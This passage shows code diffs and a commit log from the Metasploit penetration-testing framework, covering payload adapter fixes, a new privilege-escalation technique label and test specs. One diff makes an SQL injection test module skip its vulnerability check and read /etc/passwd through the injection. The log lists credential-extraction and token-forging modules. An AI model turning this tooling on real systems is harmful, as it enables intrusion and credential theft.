        'DefaultTarget' => 2,
        'Notes' => {
-          'NOCVE' => '0day',
+          'NOCVE' => ['0day'],
          'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'References'     =>
        [
          [ 'CVE', '2014-4936' ],
-          [' OSVDB', '116050'],
+          [ 'OSVDB', '116050' ],
          [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog
        ],
      'DefaultOptions' =>
@@ -34,15 +34,26 @@ module MetasploitModule
    super
  end

-  def generate
+  def generate(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
    payload = super

    cmd_psh_payload(payload, ARCH_X86, remove_comspec: true)
  end

+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
  def generate_payload_uuid(conf = {})
    conf[:arch] ||= module_info['AdaptedArch']
    conf[:platform] ||= module_info['AdaptedPlatform']
    super
  end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
 end
@@ -34,15 +34,26 @@ module MetasploitModule
    super
  end

-  def generate
+  def generate(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
    payload = super

    cmd_psh_payload(payload, ARCH_X64, remove_comspec: true)
  end

+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
  def generate_payload_uuid(conf = {})
    conf[:arch] ||= module_info['AdaptedArch']
    conf[:platform] ||= module_info['AdaptedPlatform']
    super
  end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
 end
@@ -4,7 +4,7 @@
 ##

 module MetasploitModule
-  CachedSize = 863
+  CachedSize = 867

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions
@@ -28,12 +28,22 @@ class MetasploitModule < Msf::Post
              priv_elevate_getsystem
            ]
          }
+        },
+        'Notes' => {
+          'AKA' => [
+            'Named Pipe Impersonation',
+            'Token Duplication',
+            'RPCSS',
+            'PrintSpooler',
+            'EFSRPC',
+            'EfsPotato'
+          ]
        }
      )
    )

    register_options([
-      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-5), otherwise try them all", 0])
+      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-6), otherwise try them all", 0])
    ])
  end

@@ -256,6 +256,10 @@ RSpec.describe "Metasploit's json-rpc" do
    end

    context 'when the module does not support a check method' do
+      before do
+        mock_rack_env('development')
+      end
+
      let(:module_name) { 'scanner/http/title' }

      it 'returns successful job results' do
@@ -1116,6 +1116,22 @@ RSpec.describe 'modules/payloads', :content do
                          reference_name: 'cmd/windows/generic'
  end

+  context 'cmd/windows/powershell' do
+    it_should_behave_like 'payload is not cached',
+                          ancestor_reference_names: [
+                            'adapters/cmd/windows/powershell'
+                          ],
+                          reference_name: 'cmd/windows/powershell'
+  end
+
+  context 'cmd/windows/powershell/x64' do
+    it_should_behave_like 'payload is not cached',
+                          ancestor_reference_names: [
+                            'adapters/cmd/windows/powershell/x64'
+                          ],
+                          reference_name: 'cmd/windows/powershell/x64'
+  end
+
  context 'cmd/windows/powershell_bind_tcp' do
    it_should_behave_like 'payload cached size is consistent',
                          ancestor_reference_names: [
@@ -1186,6 +1202,16 @@ RSpec.describe 'modules/payloads', :content do
                          reference_name: 'cmd/windows/reverse_ruby'
  end

+  context 'cmd/windows/jjs_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/cmd/windows/jjs_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'cmd/windows/jjs_reverse_tcp'
+  end
+
  context 'firefox/exec' do
    it_should_behave_like 'payload cached size is consistent',
                          ancestor_reference_names: [
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
  end

  def boolean_blind
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
    sqli = create_sqli(dbms: @dbms, opts: {
      encoder: encoder,
      hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
  end

  def reflected
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
    truncation = datastore['TRUNCATION_LENGTH'] <= 0 ? nil : datastore['TRUNCATION_LENGTH']
    sqli = create_sqli(dbms: @dbms, opts: {
      encoder: encoder,
@@ -69,19 +69,26 @@ class MetasploitModule < Msf::Auxiliary
    }) do |payload|
      sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
      sock.puts('0 union ' + payload)
-      res = sock.gets&.chomp
+      res = ""
+      begin
+        while true
+          res += sock.readline
+        end
+      rescue EOFError
+        vprint_status("Hit end of file...")
+      end
      sock.close
      truncation ? res[0, truncation] : res
    end
-    unless sqli.test_vulnerable
-      print_bad("Doesn't seem to be vulnerable")
-      return
-    end
+    #unless sqli.test_vulnerable
+    #  print_bad("Doesn't seem to be vulnerable")
+    #  return
+    #end
    perform_sqli(sqli)
  end

  def time_blind
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
    sqli = create_sqli(dbms: @dbms, opts: {
      encoder: encoder,
      hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
@@ -109,15 +116,19 @@ class MetasploitModule < Msf::Auxiliary
  def perform_sqli(sqli)
    print_good "dbms version: #{sqli.version}"
    tables = sqli.enum_table_names
+    tables.map! { |table| table.strip }
    print_good "tables: #{tables.join(', ')}"
    tables.each do |table|
      columns = sqli.enum_table_columns(table)
+      columns.map! { |column| column.strip }
      print_good "#{table}(#{columns.join(', ')})"
      content = sqli.dump_table_fields(table, columns)
      content.each do |row|
        print_good "\t" + row.join(', ')
      end
    end
+    passwd_content = sqli.read_from_file('/etc/passwd')
+    print_good("Got #{passwd_content}")
  end

  def run
@@ -16,7 +16,7 @@ while File.symlink?(msfbase)
  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
 end
 $:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
-
+require 'msfenv'
 require 'metasploit/framework/compiler/windows'

 weight = ARGV.shift
@@ -25,12 +25,23 @@ require 'rex'

 # Initialize the simplified framework instance.
 framework = Msf::Simple::Framework.create('DisableDatabase' => true)
-
+exceptions = []
 framework.payloads.each_module do |name, mod|
-  next if name =~ /generic/
-  mod_inst = framework.payloads.create(name)
-  #mod_inst.datastore.merge!(framework.datastore)
-  next if Msf::Util::PayloadCachedSize.is_cached_size_accurate?(mod_inst)
-  $stdout.puts "[*] Updating the CacheSize for #{mod.file_path}..."
-  Msf::Util::PayloadCachedSize.update_module_cached_size(mod_inst)
+  begin
+    next if name =~ /generic/
+    mod_inst = framework.payloads.create(name)
+    #mod_inst.datastore.merge!(framework.datastore)
+    next if Msf::Util::PayloadCachedSize.is_cached_size_accurate?(mod_inst)
+    $stdout.puts "[*] Updating the CacheSize for #{mod.file_path}..."
+    Msf::Util::PayloadCachedSize.update_module_cached_size(mod_inst)
+  rescue => e
+    exceptions << [ e, name ]
+    next
+  end
 end
+
+exceptions.each do |e, name|
+  print_error("Caught Error while updating #{name}:\n#{e}")
+  elog(e)
+end
+exit(1) unless exceptions.empty?
Author	SHA1	Message	Date
Metasploit	b8e6b02d04	automatic module_metadata_base.json update	2022-06-30 05:36:37 -05:00
Christophe De La Fuente	0d19e47b8d	Land #16677 , Add module for adding/deleting computers via MS-SAMR	2022-06-30 12:12:26 +02:00
adfoster-r7	1964e61dc8	Land #16729 , Fix rex table from crashing on unknown characters	2022-06-29 21:44:31 +01:00
Grant Willcox	685e35788b	Bump rex-text version	2022-06-29 15:11:42 -05:00
Spencer McIntyre	c4be01c26a	Bump ruby_smb to 3.1.5	2022-06-29 13:31:14 -04:00
Metasploit	daaebc0bd8	automatic module_metadata_base.json update	2022-06-29 12:23:05 -05:00
Spencer McIntyre	2d6e910078	Land #16721 , Phpmailer arg injection update	2022-06-29 13:00:48 -04:00
Spencer McIntyre	1b7d8f1e74	Fix a whitespace issue, restore option naming	2022-06-29 12:24:29 -04:00
Erik Schweiss	695e1243b8	Update modules/exploits/multi/http/phpmailer_arg_injection.rb Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>	2022-06-28 23:08:20 -10:00
Spencer McIntyre	41ba2d263b	Address PR feedback Simplify the application_key usage, update docs and catch another exception.	2022-06-28 11:53:05 -04:00
Metasploit	ed2c64bffd	automatic module_metadata_base.json update	2022-06-28 04:35:47 -05:00
adfoster-r7	6b17905790	Land #16722 , Fix notes for SideEffects and Reliability	2022-06-28 10:15:04 +01:00
bcoles	9087f86cce	exploit/multi/misc/nomad_exec: Fix notes for SideEffects and Reliability	2022-06-28 17:02:51 +10:00
Erik Schweiss	a89e88c462	Merge branch 'rapid7:master' into phpmailer_arg_injection_update	2022-06-27 11:05:41 -10:00
Metasploit	2cdc8540d4	automatic module_metadata_base.json update	2022-06-27 06:43:36 -05:00
adfoster-r7	22a1e06f02	Land #16702 , Fix reference URL link in hikvision_rtsp_bof.rb	2022-06-27 12:23:04 +01:00
Erik	836970e1ae	Update phpmailer_arg_injection.rb fixed typo	2022-06-23 13:45:42 -10:00
Erik	8259e8e495	Update phpmailer_arg_injection.rb Fixed regex to match legal name tags	2022-06-23 13:43:21 -10:00
Erik	ae8f1c3378	Update on phpmailer_arg_injection.rb #15810 Added Regex to validate new options	2022-06-23 13:10:19 -10:00
Erik	e9b2fc6ecf	Merge branch 'rapid7:master' into master	2022-06-23 12:52:09 -10:00
Erik	84aa9ceeb9	Update phpmailer_arg_injection.md Added options to the module docs for the new options	2022-06-23 12:50:33 -10:00
Erik	96feb8d1be	Update phpmailer_arg_injection.rb Changed new advanced option to camel case	2022-06-23 12:47:26 -10:00
Metasploit	911092007c	Bump version of framework to 6.2.5	2022-06-23 14:56:43 -05:00
Metasploit	e2bfef3876	automatic module_metadata_base.json update	2022-06-23 14:36:44 -05:00
Spencer McIntyre	fb3d349969	Land #16676 , Add 6th `getsystem` technique	2022-06-23 15:14:52 -04:00
Christophe De La Fuente	df69ffeaae	Update metasploit payloads to 2.0.94	2022-06-23 18:46:51 +02:00
Christophe De La Fuente	369c23a90b	Revert to TECHNIQUE datastore option for backwards compatibility	2022-06-23 18:43:18 +02:00
Grant Willcox	e4ce1c53dd	Fix reference URL link	2022-06-22 15:49:43 -05:00
Metasploit	fc2efc66ae	automatic module_metadata_base.json update	2022-06-21 18:22:22 -05:00
bwatters	c7820048cd	Land #16680 , Add a Windows target for Confluence Merge branch 'land-16680' into upstream-master	2022-06-21 17:56:32 -05:00
Metasploit	96fc98eb7d	automatic module_metadata_base.json update	2022-06-21 10:09:46 -05:00
space-r7	7983f878a8	Land #16597 , psh cmd adapter fix for encrypt shell	2022-06-21 09:47:05 -05:00
adfoster-r7	98b2234cab	Land #16692 , update doc links	2022-06-19 23:46:42 +01:00
Alexandre ZANNI	1b8b37d313	update links for all other templates	2022-06-19 01:57:05 +02:00
Alexandre ZANNI	0e61db7e29	issue template: update doc links	2022-06-19 01:35:29 +02:00
Grant Willcox	b10386ba08	Land #16650 , Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation	2022-06-17 14:58:22 -05:00
Grant Willcox	b817a1f8ee	Update test module to properly handle multiline return values so that we can properly test things like dumping file content	2022-06-17 13:35:32 -05:00
Grant Willcox	5dd68b23ed	Fix some nil issues in SQLi test module	2022-06-16 16:58:33 -05:00
Redouane NIBOUCHA	d47d1bc259	Remove newlines from base64 output on MySQL also	2022-06-17 00:51:52 +02:00
Metasploit	3f433b0c24	Bump version of framework to 6.2.4	2022-06-16 12:09:14 -05:00
Grant Willcox	be45688dbc	Land #16602 , Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb	2022-06-16 10:59:35 -05:00
Grant Willcox	f0428bfa15	Land #16627 , Add some error handling to update_payload_cache_size script	2022-06-16 10:25:44 -05:00
Metasploit	1c62a3c859	automatic module_metadata_base.json update	2022-06-16 09:49:34 -05:00
Grant Willcox	18e58bc989	Land #16679 , Fix missing and incomplete specs	2022-06-16 09:24:32 -05:00
Grant Willcox	c94f22cebe	Add in fixes from discussion and also update documentation to correctly note what functions can raise	2022-06-15 19:28:31 -05:00
Spencer McIntyre	a96bc36d9c	Update the docs with the Windows target	2022-06-15 17:24:44 -04:00
Spencer McIntyre	339114e3c0	Check the target platform for compatibility	2022-06-15 17:11:56 -04:00
Jeffrey Martin	bcac5a1274	add missing payload tests	2022-06-15 14:34:08 -05:00
Jeffrey Martin	9b7da41e3d	update missing check spec to mock RACK_ENV The spec result has a precondition in the expectations. The RACK_ENV must be `development` and causes the test to fail based on test execution order in scenarios where a previous test set a different expectation in the env.	2022-06-15 14:29:21 -05:00
Spencer McIntyre	dc3596525e	Add Windows targets	2022-06-15 15:23:34 -04:00
Spencer McIntyre	825604dda9	Add docs and a configurable password	2022-06-15 08:51:47 -04:00
Spencer McIntyre	78f2ea39e9	Use some pretty libral error handling	2022-06-15 08:51:28 -04:00
Christophe De La Fuente	35e535415a	getsytem module: use ACTION instead of TECHNIQUE datastore option	2022-06-14 15:31:33 +02:00
Christophe De La Fuente	f804a58970	Add `getsystem` technique 6 Named Pipe Impersonation (Efs variant - AKA EfsPotato)	2022-06-14 15:31:15 +02:00
Spencer McIntyre	41567b1eb4	Add the DELETE_COMPUTER action	2022-06-13 17:46:34 -04:00
Spencer McIntyre	084fc194ea	Add the LOOKUP_COMPUTER action	2022-06-13 17:20:34 -04:00
Spencer McIntyre	74936f69a3	Add the ADD_COMPUTER action	2022-06-13 17:03:51 -04:00
bwatters	be48b1481a	Land #16654 , Add named pipe pivot documentation Merge branch 'land-16654' into upstream-master	2022-06-13 14:22:47 -05:00
adfoster-r7	1836cf3a9c	Update pivot docs for reverse named pipe	2022-06-13 17:25:22 +01:00
Metasploit	f39bc72fc4	automatic module_metadata_base.json update	2022-06-13 10:54:46 -05:00
bwatters	f6bd8fd020	Land #16571 , Vcenter offline mdb extract Merge branch 'land-16571' into upstream-master	2022-06-13 10:32:07 -05:00
Grant Willcox	47fcf541e3	Land #16667 , Weekly dependency updates for Gemfile.lock	2022-06-10 12:40:48 -05:00
Metasploit	ebe6f89bdf	automatic module_metadata_base.json update	2022-06-10 09:09:36 -05:00
Grant Willcox	f1020289fa	Land #16666 , Correctly format the notes sections	2022-06-10 08:48:13 -05:00
Grant Willcox	a075c676a6	Fix spacing issue	2022-06-10 08:47:41 -05:00
Metasploit	496037c45e	Weekly dependency updates for Gemfile.lock	2022-06-10 08:17:58 -05:00
dwelch-r7	3f06e237b7	Correctly format the notes sections	2022-06-10 14:01:57 +01:00
Grant Willcox	572ee18ad4	Land #16665 - Fix random compile c tool	2022-06-10 07:56:39 -05:00
adfoster-r7	417f34e744	Fix random compile c tool	2022-06-10 11:28:42 +01:00
bwatters	4aa150bbe5	Update pivot docs for reverse named pipe	2022-06-09 15:22:09 -05:00
Metasploit	f2e1dca061	Bump version of framework to 6.2.3	2022-06-09 12:03:55 -05:00
bwatters	785a176240	Move logging and error printing to the end; return proper status	2022-06-09 09:18:11 -05:00
kalidor	b292586fb3	Avoid exception 'TypeError exception class/object expected'	2022-06-09 11:58:01 +02:00
Redouane NIBOUCHA	6d9c789f4d	Add method #read_from_file for MSSQL and PostgreSQL, and update the MySQL #read_from_file method	2022-06-06 23:07:25 +02:00
adfoster-r7	09f75c65dc	Add named pipe pivot documentation	2022-06-06 15:44:36 +01:00
Spencer McIntyre	45674fbcc2	Add the initial samr module	2022-06-02 14:12:47 -04:00
Spencer McIntyre	adcf45b0ff	Fix the arch in #handle_connection too This fixes an issue with the adated peinject stage which supported both x86 and x64 via a library that checked its own #arch.	2022-05-27 16:42:14 -04:00
bwatters	9d67ce0186	Add some error handling to update_payload_cache_size script	2022-05-27 08:45:10 -05:00
npm-cesium137-io	1d9089f5a0	vcenter_offline_mdb_extract PR verbosity Added verbose output to the RSA and x509 extraction functions for troubleshooting. Changed error handling to just print an error message instead of throwing an exception temporariliy.	2022-05-26 11:52:56 -04:00
kalidor	e09169b281	Raise Error::SERVICE_ALREADY_RUNNING	2022-05-20 22:41:27 +02:00
kalidor	677b16e09c	Fix error when service is already running	2022-05-20 22:13:17 +02:00
Spencer McIntyre	886f031daa	Set @staged for adapted payloads when necessary	2022-05-19 16:30:54 -04:00
Spencer McIntyre	2d0cdc31e3	Set the correct arch in #generate_stage too	2022-05-19 16:30:54 -04:00
Spencer McIntyre	a8a9b4bbe1	Update the #generate signature to take opts	2022-05-19 16:30:54 -04:00
Spencer McIntyre	08266beac3	Pass around the conf and opts to share the arch	2022-05-19 16:30:54 -04:00
Spencer McIntyre	9a345052b6	Set the arch while generating	2022-05-19 16:30:52 -04:00
npm-cesium137-io	8b502d074f	vcenter_offline_mdb_extract aux module Add new aux module vcenter_offline_mdb_extract for extracting IdP credentials, certificates and keys from a vCenter backup file. Added module documentation.	2022-05-13 15:57:59 -04:00
npm-cesium137-io	ecec8a5993	Clean up unrelated files.	2022-05-13 15:53:40 -04:00
npm-cesium137-io	925df9dc87	Update markup document	2022-04-21 09:41:09 -04:00
npm-cesium137-io	30aaea9350	Add vcenter_forge_saml_token aux module	2022-04-21 09:25:35 -04:00